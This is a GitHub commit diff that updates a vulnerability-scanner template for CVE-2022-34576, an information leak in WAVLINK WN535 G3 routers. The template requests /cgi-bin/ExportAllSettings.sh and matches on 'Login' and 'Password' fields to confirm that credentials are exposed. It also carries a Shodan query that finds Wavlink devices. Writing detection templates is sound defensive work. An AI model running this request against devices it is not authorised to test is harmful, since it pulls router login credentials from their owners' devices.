Update CVE-2022-34576.yaml

patch-1
Ritik Chaddha 2022-08-15 11:53:42 +05:30 committed by GitHub
parent b3725ecc16
commit fa744d51e0
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 17 additions and 14 deletions

View File

@ -7,27 +7,30 @@ info:
description: |
A vulnerability in /cgi-bin/ExportAllSettings.sh of WAVLINK WN535 G3 M35G3R.V5030.180927 allows attackers to execute arbitrary code via a crafted POST request.
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34576
- https://github.com/pghuanghui/CVE_Request/blob/main/WAVLINK%20WN535%20G3_Sensitive%20information%20leakage.md
- https://nvd.nist.gov/vuln/detail/CVE-2022-34576
classification:
cve-id: CVE-2022-34576
metadata:
verified: true
shodan-query: http.html:"Wavlink"
verified: "true"
tags: access,control,cve,2022
tags: cve,cve2022,wavlink,exposure
requests:
- raw:
- |
GET /cgi-bin/ExportAllSettings.sh HTTP/1.1
Host: {{Hostname}}
- method: GET
path:
- "{{BaseURL}}/cgi-bin/ExportAllSettings.sh"
redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
words:
- 'Login='
- 'Password='
- 'Model='
- 'AuthMode='
condition: and
- type: status
status:
- 200
- type: word
words:
- 'Login'
- 'Password'